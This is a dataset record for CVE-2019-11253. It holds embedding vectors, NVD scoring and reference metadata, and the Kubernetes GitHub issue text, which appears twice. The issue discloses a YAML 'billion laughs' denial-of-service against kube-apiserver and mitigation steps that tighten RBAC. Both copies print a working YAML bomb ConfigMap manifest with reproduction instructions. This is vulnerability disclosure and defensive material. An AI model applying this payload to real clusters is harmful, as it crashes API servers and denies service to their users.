0.0028809895738959312, -0.0036961666774004698, -0.011126819998025894, 0.0059466129168868065, 0.0017757973400875926, 0.013920717872679234, -0.013530547730624676, 0.03210543841123581, -0.014673189260065556, 0.011621500365436077, -0.0055529591627418995, -0.0027886724565178156, 0.020442135632038116, 0.005765462759882212, 0.00009237150516128168, 0.005967515055090189, 0.010841160081326962, -0.03692682832479477, 0.01851915381848812, 0.0027660285122692585, -0.0008865922573022544, -0.009085393510758877, -0.009155066683888435, -0.008702190592885017, -0.019229819998145103, -0.004173428285866976, -0.036731746047735214, -0.003184068249538541, -0.02892833948135376, -0.008785798214375973, -0.008416530676186085, -0.002034459263086319, 0.018156852573156357, 0.028956208378076553, -0.025054505094885826, -0.006827979814261198, 0.012290364131331444, -0.013920717872679234, 0.004075885750353336, 0.010541564784944057, 0.010039917193353176, -0.0018132467521354556, -0.016860930249094963, -0.009886636398732662, -0.022476594895124435, -0.014924013055860996, 0.001788861001841724, -0.02118067257106304, 0.003922604955732822, -0.015077294781804085, -0.012896521016955376, -0.0031579406931996346, 0.009273511357605457, 0.013098573312163353, -0.021751992404460907, 0.006810561753809452, -0.009823930449783802, -0.020107703283429146, 0.021292150020599365, 0.017878159880638123, 0.021933143958449364, -0.0028618292417377234, -0.006810561753809452, 0.0025047538802027702, 0.02042820118367672, -0.000613560201600194, -0.013063737191259861, 0.0064726462587714195, 0.004493925720453262, 0.025611892342567444, -0.0003496726858429611, 0.012701435945928097, 0.007308725267648697, -0.00009057524584932253, 0.00258487812243402, 0.005716691259294748, -0.0034279245883226395, 0.012840782292187214, 0.009182936511933804, 0.0009823930449783802, 0.01895112730562687, -0.013690796680748463, -0.032495610415935516, 0.043197423219680786, -0.011579696089029312, -0.0008143062586896122, -0.012840782292187214, 0.0021598711609840393, -0.018533088266849518, -0.012534219771623611, -0.000058188063121633604, -0.028900470584630966, 0.015314183197915554, -0.006361168809235096, 0.03344316780567169, -0.0011199977016076446, -0.0005800299113616347, 0.022894633933901787, 0.0009571364498697221, 0.0005478060338646173, -0.027381593361496925, 0.011746912263333797, -0.008806700818240643, -0.026211081072688103, 0.007155444007366896, -0.00558082852512598, 0.017404381185770035, 0.02233724854886532, -0.0060476395301520824, -0.00479003693908453, 0.022392986342310905, -0.0006671214941889048, -0.009036622010171413, 0.00003214223761460744, 0.0026144892908632755, 0.0044242520816624165, 0.01307070441544056, 0.007782503496855497, 0.003135296981781721, 0.011280101723968983, 0.027158638462424278, -0.010478858835995197, 0.018574891611933708, -0.020483938977122307, -0.005458900239318609, 0.0002033588389167562, 0.0021859987173229456, -0.0005330004496499896, -0.02105526067316532, 0.012269461527466774, 0.010917800478637218, 0.024009406566619873, 0.006873267702758312, -0.009224739857017994, 0.010019015520811081, -0.0025047538802027702, -0.007859144359827042, 0.011907161213457584, 0.007475941441953182, -0.004354578908532858, 0.017989637330174446, -0.02478974685072899, -0.008019392378628254, -0.006023253779858351, -0.007434137165546417, 0.024817615747451782 ]
1,677
CVE-2019-11253
2019-10-17T16:15:10.443000
Improper input validation in the Kubernetes API server in versions v1.0-1.12 and versions prior to v1.13.12, v1.14.8, v1.15.5, and v1.16.2 allows authorized users to send malicious YAML or JSON payloads, causing the API server to consume excessive CPU or memory, potentially crashing and becoming unavailable. Prior to v1.14.0, default RBAC policy authorized anonymous users to submit requests that could trigger this vulnerability. Clusters upgraded from a version prior to v1.14.0 keep the more permissive policy by default for backwards compatibility.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "jordan@liggitt.net", "type": "Secondary" } ] }
[ { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3239" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3811" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3905" }, { "source": "jordan@liggitt.net", "tags": [ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/83253" }, { "source": "jordan@liggitt.net", "tags": null, "url": "https://groups.google.com/forum/#%21topic/kubernetes-security-announce/jk8polzSUxs" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20191031-0006/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "F0820894-56B7-4CB8-AE5C-29639FA59718", "versionEndExcluding": null, "versionEndIncluding": "1.12.10", "versionStartExcluding": null, "versionStartIncluding": "1.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "9FF055F3-E11D-41DB-9ED7-434D9ED905B4", "versionEndExcluding": "1.13.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.13.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "ADA3952E-8133-4E6A-A365-4FD74ABA962C", "versionEndExcluding": "1.14.8", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.14.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "F9F7837F-DA69-453E-8B24-1EDF0A5CAB4C", "versionEndExcluding": "1.15.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.15.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "E1BDF819-871C-4E34-978F-BAFF8D895B84", "versionEndExcluding": "1.16.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.16.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:openshift_container_platform:3.9:*:*:*:*:*:*:*", "matchCriteriaId": "309CB6F8-F178-454C-BE97-787F78647C28", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openshift_container_platform:3.10:*:*:*:*:*:*:*", "matchCriteriaId": "4DBCD38F-BBE8-488C-A8C3-5782F191D915", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*", "matchCriteriaId": "2F87326E-0B56-4356-A889-73D026DB1D4B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/83253
[ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVE-2019-11253 is a denial of service vulnerability in the kube-apiserver, allowing authorized users sending malicious YAML or JSON payloads to cause kube-apiserver to consume excessive CPU or memory, potentially crashing and becoming unavailable. This vulnerability has been given an initial severity of High, with a score of 7.5 ([CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)). Prior to v1.14.0, default RBAC policy authorized anonymous users to submit requests that could trigger this vulnerability. Clusters upgraded from a version prior to v1.14.0 keep the more permissive policy by default for backwards compatibility. See the mitigation section below for instructions on how to install the more restrictive v1.14+ policy. **Affected versions:** * Kubernetes v1.0.0-1.12.x * Kubernetes v1.13.0-1.13.11, resolved in v1.13.12 by https://github.com/kubernetes/kubernetes/pull/83436 * Kubernetes v1.14.0-1.14.7, resolved in v1.14.8 by https://github.com/kubernetes/kubernetes/pull/83435 * Kubernetes v1.15.0-1.15.4, resolved in v1.15.5 by https://github.com/kubernetes/kubernetes/pull/83434 * Kubernetes v1.16.0-1.16.1, resolved in v1.16.2 by https://github.com/kubernetes/kubernetes/pull/83433 All four patch releases are now available. Fixed in master by #83261 **Mitigation:** Requests that are rejected by authorization do not trigger the vulnerability, so managing authorization rules and/or access to the Kubernetes API server mitigates which users are able to trigger this vulnerability. To manually apply the more restrictive v1.14.x+ policy, either as a pre-upgrade mitigation, or as an additional protection for an upgraded cluster, save the [attached file](https://github.com/kubernetes/kubernetes/files/3735508/rbac.yaml.txt) as `rbac.yaml`, and run: ```sh kubectl auth reconcile -f rbac.yaml --remove-extra-subjects --remove-extra-permissions ``` **Note: this removes the ability for unauthenticated users to use `kubectl auth can-i`** If you are running a version prior to v1.14.0: * in addition to installing the restrictive policy, turn off autoupdate for this clusterrolebinding so your changes aren’t replaced on an API server restart: ```sh kubectl annotate --overwrite clusterrolebinding/system:basic-user rbac.authorization.kubernetes.io/autoupdate=false ``` * after upgrading to v1.14.0 or greater, you can remove this annotation to reenable autoupdate: ```sh kubectl annotate --overwrite clusterrolebinding/system:basic-user rbac.authorization.kubernetes.io/autoupdate=true ``` ============= **Original description follows:** **Introduction** Posting this as an issue following report to the security list who suggested putting it here as it's already public in a Stackoverflow question [here](https://stackoverflow.com/questions/58129150/security-yaml-bomb-user-can-restart-kube-api-by-sending-configmap/58133282#58133282) **What happened**: When creating a ConfigMap object which has recursive references contained in it, excessive CPU usage can occur. This appears to be an instance of a ["Billion Laughs" attack](https://en.wikipedia.org/wiki/Billion_laughs_attack) which is quite well known as an XML parsing issue. Applying this manifest to a cluster causes the client to hang for some time with considerable CPU usage. ``` apiVersion: v1 data: a: &a ["web","web","web","web","web","web","web","web","web"] b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] kind: ConfigMap metadata: name: yaml-bomb namespace: default ``` **What you expected to happen**: Ideally it would be good for a maximum size of entity to be defined, or perhaps some limit on recursive references in YAML parsed by kubectl. One note is that the original poster on Stackoverflow indicated that the resource consumption was in `kube-apiserver` but both tests I did (1.16 client against 1.15 Kubeadm cluster and 1.16 client against 1.16 kubeadm cluster) showed the CPU usage client-side. **How to reproduce it (as minimally and precisely as possible)**: Get the manifest above and apply to a cluster as normal with `kubectl create -f <manifest>`. Use `top` or another CPU monitor to observe the quantity of CPU time used. **Anything else we need to know?**: **Environment**: - Kubernetes version (use `kubectl version`): **test 1** (linux AMD64 client, Kubeadm cluster running in kind) ``` Client Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:36:53Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"} Server Version: version.Info{Major:"1", Minor:"15", GitVersion:"v1.15.0", GitCommit:"e8462b5b5dc2584fdcd18e6bcfe9f1e4d970a529", GitTreeState:"clean", BuildDate:"2019-06-25T23:41:27Z", GoVersion:"go1.12.5", Compiler:"gc", Platform:"linux/amd64"} ``` **test 2** (Linux AMD64 client, Kubeadm cluster running in VMWare Workstation) ``` Client Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:36:53Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"} Server Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:27:17Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"} ```
CVE-2019-11253: Kubernetes API Server JSON/YAML parsing vulnerable to resource exhaustion attack
https://api.github.com/repos/kubernetes/kubernetes/issues/83253/comments
17
2019-09-27T16:53:31
2022-10-14T02:09:16Z
https://github.com/kubernetes/kubernetes/issues/83253
499,548,171
83,253
true
This is a GitHub Issue repo:kubernetes owner:kubernetes Title : CVE-2019-11253: Kubernetes API Server JSON/YAML parsing vulnerable to resource exhaustion attack Issue date: --- start body --- CVE-2019-11253 is a denial of service vulnerability in the kube-apiserver, allowing authorized users sending malicious YAML or JSON payloads to cause kube-apiserver to consume excessive CPU or memory, potentially crashing and becoming unavailable. This vulnerability has been given an initial severity of High, with a score of 7.5 ([CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)). Prior to v1.14.0, default RBAC policy authorized anonymous users to submit requests that could trigger this vulnerability. Clusters upgraded from a version prior to v1.14.0 keep the more permissive policy by default for backwards compatibility. See the mitigation section below for instructions on how to install the more restrictive v1.14+ policy. **Affected versions:** * Kubernetes v1.0.0-1.12.x * Kubernetes v1.13.0-1.13.11, resolved in v1.13.12 by https://github.com/kubernetes/kubernetes/pull/83436 * Kubernetes v1.14.0-1.14.7, resolved in v1.14.8 by https://github.com/kubernetes/kubernetes/pull/83435 * Kubernetes v1.15.0-1.15.4, resolved in v1.15.5 by https://github.com/kubernetes/kubernetes/pull/83434 * Kubernetes v1.16.0-1.16.1, resolved in v1.16.2 by https://github.com/kubernetes/kubernetes/pull/83433 All four patch releases are now available. Fixed in master by #83261 **Mitigation:** Requests that are rejected by authorization do not trigger the vulnerability, so managing authorization rules and/or access to the Kubernetes API server mitigates which users are able to trigger this vulnerability. To manually apply the more restrictive v1.14.x+ policy, either as a pre-upgrade mitigation, or as an additional protection for an upgraded cluster, save the [attached file](https://github.com/kubernetes/kubernetes/files/3735508/rbac.yaml.txt) as `rbac.yaml`, and run: ```sh kubectl auth reconcile -f rbac.yaml --remove-extra-subjects --remove-extra-permissions ``` **Note: this removes the ability for unauthenticated users to use `kubectl auth can-i`** If you are running a version prior to v1.14.0: * in addition to installing the restrictive policy, turn off autoupdate for this clusterrolebinding so your changes aren’t replaced on an API server restart: ```sh kubectl annotate --overwrite clusterrolebinding/system:basic-user rbac.authorization.kubernetes.io/autoupdate=false ``` * after upgrading to v1.14.0 or greater, you can remove this annotation to reenable autoupdate: ```sh kubectl annotate --overwrite clusterrolebinding/system:basic-user rbac.authorization.kubernetes.io/autoupdate=true ``` ============= **Original description follows:** **Introduction** Posting this as an issue following report to the security list who suggested putting it here as it's already public in a Stackoverflow question [here](https://stackoverflow.com/questions/58129150/security-yaml-bomb-user-can-restart-kube-api-by-sending-configmap/58133282#58133282) **What happened**: When creating a ConfigMap object which has recursive references contained in it, excessive CPU usage can occur. This appears to be an instance of a ["Billion Laughs" attack](https://en.wikipedia.org/wiki/Billion_laughs_attack) which is quite well known as an XML parsing issue. Applying this manifest to a cluster causes the client to hang for some time with considerable CPU usage. ``` apiVersion: v1 data: a: &a ["web","web","web","web","web","web","web","web","web"] b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] kind: ConfigMap metadata: name: yaml-bomb namespace: default ``` **What you expected to happen**: Ideally it would be good for a maximum size of entity to be defined, or perhaps some limit on recursive references in YAML parsed by kubectl. One note is that the original poster on Stackoverflow indicated that the resource consumption was in `kube-apiserver` but both tests I did (1.16 client against 1.15 Kubeadm cluster and 1.16 client against 1.16 kubeadm cluster) showed the CPU usage client-side. **How to reproduce it (as minimally and precisely as possible)**: Get the manifest above and apply to a cluster as normal with `kubectl create -f <manifest>`. Use `top` or another CPU monitor to observe the quantity of CPU time used. **Anything else we need to know?**: **Environment**: - Kubernetes version (use `kubectl version`): **test 1** (linux AMD64 client, Kubeadm cluster running in kind) ``` Client Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:36:53Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"} Server Version: version.Info{Major:"1", Minor:"15", GitVersion:"v1.15.0", GitCommit:"e8462b5b5dc2584fdcd18e6bcfe9f1e4d970a529", GitTreeState:"clean", BuildDate:"2019-06-25T23:41:27Z", GoVersion:"go1.12.5", Compiler:"gc", Platform:"linux/amd64"} ``` **test 2** (Linux AMD64 client, Kubeadm cluster running in VMWare Workstation) ``` Client Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:36:53Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"} Server Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:27:17Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"} ``` --- end body ---
6,064
[ -0.02656124159693718, -0.014549623243510723, -0.013647753745317459, 0.007131150923669338, 0.019442062824964523, -0.03254709765315056, -0.02376784197986126, 0.01888338290154934, 0.018580099567770958, 0.017973532900214195, 0.017877759411931038, 0.0064567443914711475, 0.021197915077209473, 0.0028752065263688564, 0.03310577943921089, 0.03767099231481552, -0.01671251282095909, -0.026337770745158195, -0.001256032264791429, -0.006899697706103325, -0.006923641078174114, -0.015164170414209366, -0.023241087794303894, 0.06017781421542168, 0.019729385152459145, 0.018675873056054115, 0.015267925336956978, 0.018037382513284683, -0.029546190053224564, 0.017989495769143105, 0.015778718516230583, 0.01537168025970459, -0.004613100551068783, 0.00994450319558382, 0.06672234833240509, 0.007893349975347519, 0.040001485496759415, 0.037575218826532364, -0.02791803702712059, -0.018085269257426262, 0.0010854353895410895, -0.04807840287685394, -0.0008255494176410139, 0.03454238548874855, -0.015148208476603031, 0.0054271770641207695, -0.015954304486513138, -0.022171614691615105, -0.027119921520352364, 0.008048982359468937, 0.012825695797801018, -0.05123893544077873, -0.02892366051673889, -0.05098353698849678, 0.015810644254088402, -0.04715259000658989, -0.003433886682614684, -0.0067560370080173016, 0.02719973400235176, 0.020080555230379105, 0.035053178668022156, -0.00152539589907974, 0.011189562268555164, 0.027455130591988564, 0.024230748414993286, 0.010998014360666275, -0.0054311673156917095, 0.031637247651815414, -0.03693672642111778, -0.007482321001589298, -0.024342484772205353, -0.014581547118723392, 0.00017970040789805353, 0.006129517685621977, 0.060273587703704834, -0.023640144616365433, 0.029498303309082985, 0.042459677904844284, -0.012865602038800716, 0.019298402592539787, -0.006899697706103325, 0.03248324990272522, -0.0283490177243948, 0.005678582936525345, 0.03320155292749405, 0.005451120436191559, -0.0481741763651371, -0.06400876492261887, 0.029131170362234116, -0.05095161497592926, -0.021900255233049393, 0.03272268548607826, 0.011053882539272308, -0.021421385928988457, 0.01536369975656271, 0.026018524542450905, -0.026289884001016617, -0.0009612288558855653, -0.06285947561264038, -0.015467454679310322, -0.06404069066047668, -0.005111921578645706, -0.0020032667089253664, -0.0009303019032813609, 0.006640310399234295, 0.016505002975463867, -0.013144942000508308, 0.027710527181625366, -0.01988900639116764, 0.1316569298505783, 0.042778924107551575, 0.008088887669146061, -0.03655363246798515, -0.015555246733129025, -0.02054346166551113, 0.012282978743314743, -0.003898788243532181, -0.0011363151716068387, -0.060912080109119415, -0.013384375721216202, -0.03304193168878555, -0.024597881361842155, -0.003621443407610059, -0.030615663155913353, -0.06183789297938347, 0.02726358361542225, 0.005610743071883917, 0.000019485210941638798, -0.013583905063569546, -0.02298569120466709, -0.017606399953365326, 0.004668968264013529, -0.02236316166818142, -0.021804481744766235, 0.0061774044297635555, -0.00531943142414093, 0.027008187025785446, 0.056378789246082306, 0.0009312995825894177, -0.0039267223328351974, -0.027487054467201233, -0.012809733860194683, 0.01743081584572792, 0.011939789168536663, -0.03304193168878555, 0.007538189180195332, -0.002555960789322853, 0.015204076655209064, -0.01255433727055788, 0.0032303675543516874, -0.006273177918046713, -0.008436067961156368, 0.03291423246264458, 0.033361174166202545, 0.04913191497325897, -0.04376858472824097, -0.01880357228219509, 0.014166528359055519, 0.016313455998897552, 0.03460623323917389, 0.0036633445415645838, -0.03447853401303291, -0.014733188785612583, -0.02758282795548439, 0.015148208476603031, 0.0012709969887509942, 0.016321437433362007, -0.010375485755503178, -0.021437348797917366, 0.024166898801922798, 0.0030448059551417828, -0.030583737418055534, 0.017718136310577393, 0.00734664173796773, -0.03760714456439018, -0.016904059797525406, 0.00976093765348196, 0.023879578337073326, 0.02691241353750229, 0.016856173053383827, -0.016305474564433098, 0.02895558439195156, -0.017526589334011078, 0.0162256620824337, 0.02898751012980938, 0.005004176404327154, -0.014629433862864971, 0.016600776463747025, -0.010159994475543499, -0.012945413589477539, 0.0006330043543130159, 0.018021419644355774, 0.003669330384582281, -0.00778560433536768, -0.02405516430735588, 0.009329956024885178, -0.02336878515779972, -0.010471259243786335, 0.027981886640191078, -0.040320731699466705, 0.012658092193305492, -0.006484678480774164, -0.04367281123995781, 0.017287155613303185, -0.05682573467493057, 0.03623438626527786, 0.0053952522575855255, 0.009657182730734348, 0.009170332923531532, -0.02338474802672863, -0.048333797603845596, -0.0047687324695289135, -0.0039726137183606625, 0.010742617771029472, 0.013192828744649887, 0.01272992230951786, -0.0016032119747251272, 0.008033020421862602, -0.035819366574287415, -0.0009682123782113194, 0.044502850621938705, -0.02724762074649334, 0.022618558257818222, -0.0053074597381055355, -0.005522950552403927, -0.011564675718545914, 0.0005043084383942187, -0.03869257867336273, -0.014286245219409466, -0.008483954705297947, 0.042395830154418945, -0.0010934164747595787, 0.01486886851489544, 0.01605805940926075, 0.017957570031285286, -0.04935538396239281, 0.0010131063172593713, 0.01709560677409172, 0.012267015874385834, -0.008084896951913834, 0.018612025305628777, 0.0020042643882334232, -0.033967744559049606, -0.017893722280859947, -0.0013308555353432894, 0.03875642642378807, -0.035053178668022156, 0.014581547118723392, -0.016920022666454315, 0.019282439723610878, -0.032978080213069916, 0.00020838264026679099, 0.023815728724002838, 0.0036154575645923615, 0.0013667707098647952, 0.014549623243510723, 0.011221486143767834, 0.0063889045268297195, -0.0008095871307887137, -0.004772723186761141, 0.038532957434654236, 0.006779980380088091, -0.03744751960039139, 0.03272268548607826, 0.011133694089949131, 0.00793724600225687, -0.0004020500637125224, 0.01709560677409172, -0.015475435182452202, -0.024166898801922798, 0.04220428317785263, 0.0006873758975416422, -0.04108692333102226, -0.042427752166986465, -0.0053234221413731575, -0.007318707648664713, 0.019617648795247078, 0.03425506502389908, 0.041757337749004364, 0.009250144474208355, 0.023560332134366035, 0.002196809509769082, -0.00786940660327673, 0.021165989339351654, 0.02020825259387493, 0.010503184050321579, 0.0017428819555789232, -0.06685005128383636, -0.036872878670692444, -0.015148208476603031, -0.04609907791018486, -0.0071191792376339436, -0.0237518809735775, 0.015427548438310623, -0.0022427011281251907, 0.0184843260794878, 0.018580099567770958, 0.046641796827316284, -0.02727954462170601, 0.007286783307790756, -0.033361174166202545, 0.02408708818256855, 0.00531544117256999, 0.026066411286592484, -0.025060787796974182, 0.01819700561463833, -0.04680142179131508, 0.02686452493071556, -0.014390000142157078, 0.009752956219017506, -0.0011572656221687794, -0.05401637405157089, 0.010774542577564716, -0.029131170362234116, -0.003974609076976776, 0.020687121897935867, 0.015810644254088402, -0.02095847949385643, -0.008268463425338268, 0.029258867725729942, 0.033648498356342316, -0.0022526774555444717, -0.049068063497543335, 0.024549994617700577, 0.0032363533973693848, -0.029147133231163025, -0.03735174611210823, 0.021565048024058342, -0.03620246425271034, 0.010295674204826355, -0.010567032732069492, 0.02300165221095085, -0.014948680065572262, -0.031222229823470116, -0.007973161526024342, -0.06333834677934647, -0.03214804083108902, -0.0030627634841948748, 0.028795963153243065, 0.010207881219685078, -0.019314365461468697, -0.01960168592631817, 0.009545446373522282, 0.002745513105764985, 0.023448597639799118, -0.0033620563335716724, -0.04293854534626007, -0.00046440272126346827, 0.002807366894558072, -0.010590976104140282, 0.0015114288544282317, 0.052579768002033234, -0.005471073091030121, 0.028205357491970062, 0.015299850143492222, 0.004481411539018154, -0.012083449400961399, 0.0061095645651221275, 0.027455130591988564, -0.038916051387786865, 0.041725412011146545, -0.035755518823862076, 0.017207343131303787, 0.014621453359723091, -0.0006893711979500949, 0.010032296180725098, 0.013998923823237419, -0.00012507947394624352, -0.027311470359563828, -0.01711156964302063, -0.0063849142752587795, 0.014533660374581814, 0.0023484511766582727, 0.010295674204826355, -0.0244222953915596, -0.0453328900039196, 0.002152913250029087, -0.00020962969574611634, -0.050504669547080994, 0.023480521515011787, -0.021405424922704697, 0.009050616063177586, 0.03585129231214523, -0.01677636243402958, 0.01450173556804657, 0.0216608215123415, 0.014286245219409466, 0.038947977125644684, 0.04191695898771286, 0.02413497492671013, -0.03431891277432442, 0.04996195062994957, -0.0404803566634655, -0.03939491882920265, -0.022171614691615105, -0.003723202971741557, 0.0004843555798288435, -0.02483731508255005, 0.04303431883454323, -0.027503017336130142, 0.04826994985342026, 0.05312248319387436, -0.008994747884571552, 0.03355272486805916, -0.003549613058567047, 0.022203538566827774, -0.0047128647565841675, -0.025220410898327827, 0.012139317579567432, -0.04226813092827797, 0.011923827230930328, 0.011021957732737064, -0.04111884534358978, -0.0063011120073497295, 0.0065644895657896996, 0.06665850430727005, 0.03238747641444206, 0.0011961737181991339, -0.0044494871981441975, 0.030280454084277153, -0.012650110758841038, -0.015267925336956978, 0.014765113592147827, 0.020703082904219627, -0.02269836887717247, 0.0059858569875359535, 0.012570299208164215, 0.018963195383548737, 0.036489784717559814, -0.016888096928596497, 0.015587171539664268, 0.02544388175010681, 0.013703621923923492, 0.00013131473679095507, -0.012881563976407051, -0.010886278003454208, -0.018755685538053513, -0.021469272673130035, 0.027694564312696457, -0.0081966333091259, -0.028891736641526222, 0.026449507102370262, -0.027040110900998116, 0.0053593371994793415, -0.02825324423611164, -0.030998757109045982, -0.01854817569255829, -0.0023823711089789867, -0.00978488102555275, -0.021932179108262062, -0.05066429451107979, -0.003757122904062271, -0.032259777188301086, 0.012817715294659138, 0.00007694320083828643, 0.012195185758173466, -0.005538912955671549, -0.04255545139312744, 0.009513521566987038, 0.005111921578645706, 0.007530208211392164, 0.04028880596160889, -0.011812090873718262, 0.0152200385928154, 0.035117026418447495, 0.016050077974796295, 0.004493383225053549, -0.0536971278488636, 0.01240269560366869, -0.03971416503190994, 0.0030567776411771774, 0.0321161188185215, 0.022139688953757286, 0.010958109050989151, -0.014900793321430683, 0.0057623847387731075, 0.006831857841461897, 0.001080447225831449, -0.022171614691615105, 0.009713050909340382, -0.011907864362001419, -0.0034817734267562628, -0.023496484383940697, -0.008236539550125599, -0.005658630281686783, -0.0446624755859375, -0.015236001461744308, -0.00008492434426443651, -0.004321788903325796, 0.011836034245789051, 0.03419121354818344, -0.010191919282078743, -0.055006034672260284, -0.05264361575245857, 0.018739722669124603, 0.0023085454013198614, -0.00033770210575312376, 0.0024522060994058847, 0.045524436980485916, 0.009976428002119064, 0.007594057358801365, -0.031924571841955185, 0.02233123779296875, -0.015635058283805847, 0.016983872279524803, -0.031158380210399628, -0.035787444561719894, 0.06177404522895813, -0.004529298283159733, -0.027119921520352364, -0.012562318705022335, -0.017542552202939987, 0.014262301847338676, 0.0061255269683897495, -0.0010021321941167116, 